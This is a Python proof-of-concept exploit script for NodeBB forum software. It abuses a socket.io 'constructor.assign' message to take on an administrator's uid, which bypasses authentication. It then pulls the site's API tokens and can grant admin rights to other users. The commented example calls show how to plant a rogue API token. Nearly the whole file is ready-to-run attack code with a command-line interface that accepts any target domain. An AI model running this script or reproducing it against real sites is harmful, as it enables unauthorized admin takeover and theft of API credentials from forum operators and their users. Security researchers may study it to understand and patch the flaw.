#!/usr/bin/env python3 import requests import random import string import json import sys import argparse class MyParser(argparse.ArgumentParser): def error(self, message): sys.stderr.write('error: %s\n' % message) self.print_help() sys.exit(2) requests.packages.urllib3.disable_warnings() class NodeBBAuthBypasser: def __init__(self, basedomain, http=False, proxies={}, target_uid=1, debug=False): self.priv_target_uid = target_uid self.session = None self.proxies = proxies self.site = '{}://{}/'.format('http' if http else 'https', basedomain) self.socketiopath = 'socket.io/' self.socketioparams = {'EIO' : '4', 'transport' : 'polling', 't' : ''} self.headers = {'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0'} self.token = None self.sid = None self.cookie = None self.mid = 1 self.session_escalated = False self.debug = debug def _gen_token(self): '''Generate random token for socket.io session''' self.token = ''.join(random.choice(string.ascii_letters) for i in range(6)) def set_express_cookie(self, cookie): '''Set an express.sid session id cookie to use for the session''' self.cookie = {'express.sid': cookie} def start_session(self): '''Setup a HTTP request session and a socket.io session''' self.mid = 1 self.session = requests.Session() self.session.proxies = self.proxies if 'https' in self.proxies: self.session.verify = False # setup cookies for session if self.cookie: # used provided cookie self.session.cookies.update(self.cookie) else: # get a new one r = self.session.get(self.site, headers=self.headers) if not r.status_code == 200: raise Exception('Bad response from server to session setup: {}'.format(r.content.decode())) params = dict(self.socketioparams) self._gen_token() params['t'] = self.token # setup socket.io http "socket" r = self.session.get('{}{}'.format(self.site, self.socketiopath), params=params, headers=self.headers) if not r.status_code == 200: raise Exception('Bad response to socketio setup: {}'.format(r.content.decode())) # handshake rd = r.content.decode() self.sid = json.loads(rd[1:])['sid'] headers = dict(self.headers) headers['Content-Type'] = 'text/plain;charset=UTF-8' params = dict(self.socketioparams) params['t'] = self.token params['sid'] = self.sid r = self.session.post('{}{}'.format(self.site, self.socketiopath), headers = headers, params=params, data='40') if r.status_code != 200: raise Exception('Error in handshake: {}'.format(r.content.decode())) self.session.get('{}{}'.format(self.site, self.socketiopath), params=params, headers=self.headers) if r.status_code != 200: raise Exception('Error in handshake response: {}'.format(r.content.decode())) # escalate self._run_privesc() def _run_privesc(self): '''Send message to escalate privilges in socket to provided uid''' params = dict(self.socketioparams) params['t'] = self.token params['sid'] = self.sid data = '42*REPLACE_MID*["constructor.assign",{"uid":*REPLACE_UID*}]'.replace('*REPLACE_UID*', str(self.priv_target_uid)).replace('*REPLACE_MID*', str(self.mid)) r = self.session.post('{}{}'.format(self.site, self.socketiopath), headers = self.headers, params=params, data=data) if r.status_code != 200: raise Exception('Error in running privesc: {}'.format(r.content.decode())) self.session_escalated = True self.mid += 1 def _call_function(self, data): '''Helper function to call ''' params = dict(self.socketioparams) params['t'] = self.token params['sid'] = self.sid r = self.session.post('{}{}'.format(self.site, self.socketiopath), headers = self.headers, params=params, data=data) if r.status_code != 200: raise Exception('Error in calling function: {}'.format(r.content.decode())) r = self.session.get('{}{}'.format(self.site, self.socketiopath), params=params, headers=self.headers) if r.status_code != 200: raise Exception('Error in receiving response to called function: {}'.format(r.content.decode())) return r.content def get_timestamp(self): data = '42*REPLACE*["admin.getServerTime"]'.replace('*REPLACE*', str(self.mid)) self.mid +=1 return self._call_function(data) def get_tokens(self): data = '42*REPLACE*["admin.settings.get",{"hash": "core.api"}]'.replace('*REPLACE*', str(self.mid)) self.mid +=1 return self._call_function(data) def add_admins(self, uids): params = str([int(a) for a in uids]) data = '42*REPLACE*"admin.user.makeAdmins", *PARAMS*]'.replace('*REPLACE*', str(self.mid)).replace('*PARAMS*', params) self.mid +=1 return self._call_function(data) # Some example socket.io calls # admin function to check time #425["admin.getServerTime"] # set the api keys #422["admin.settings.set",{"hash":"core.api","values":{"tokens":[{"description":"Added by hacking","timestamp":"","token":"12af1039-acd5-4d3e-ad50-37bf6d7bb163","uid":1}],"requireHttps":"off"}}] # get the api keys #424["admin.settings.get",{"hash": "core.api"}] # add some users by uid to the admins group #421["admin.user.makeAdmins", [2]] # user function to get user details by uid, admin not required # #422["user.getUserByUID",1] if __name__ == "__main__": parser = MyParser() parser.epilog = "Example usage: {} -d try.nodebb.org -c [express.sid_cookie_value]".format(sys.argv[0]) parser.description = 'POC exploit to create a NodeBB socket.io session and escalate to admin and obtain any configured api tokens. If the 2factor plugin is enabled you need to provide a cookie value for a logged on user.' parser.add_argument('-d', '--domain', type=str, required=True, help='Host and port to connect to') parser.add_argument('-p', '--proxies', type=str, default=None, help='Proxy server to use for the connection. Default: none') parser.add_argument('-c', '--cookie', type=str, default=None, help='Cookie value for express.sid cookie to escalate associated with an existing http logon session') parser.add_argument('-u', '--uid', type=int, default=1, help='The target uid to use for the privesc. Default: 1') parser.add_argument('-n', '--http', action='store_true', default=False, help='Send request using http instead of https') args = parser.parse_args() if args.proxies: proxies = {'http' : args.proxies, 'https' : args.proxies} else: proxies = {} bypasser = NodeBBAuthBypasser(args.domain, http=args.http, proxies=proxies, target_uid=args.uid) if args.cookie: bypasser.set_express_cookie(args.cookie) bypasser.start_session() print(bypasser.get_tokens().decode())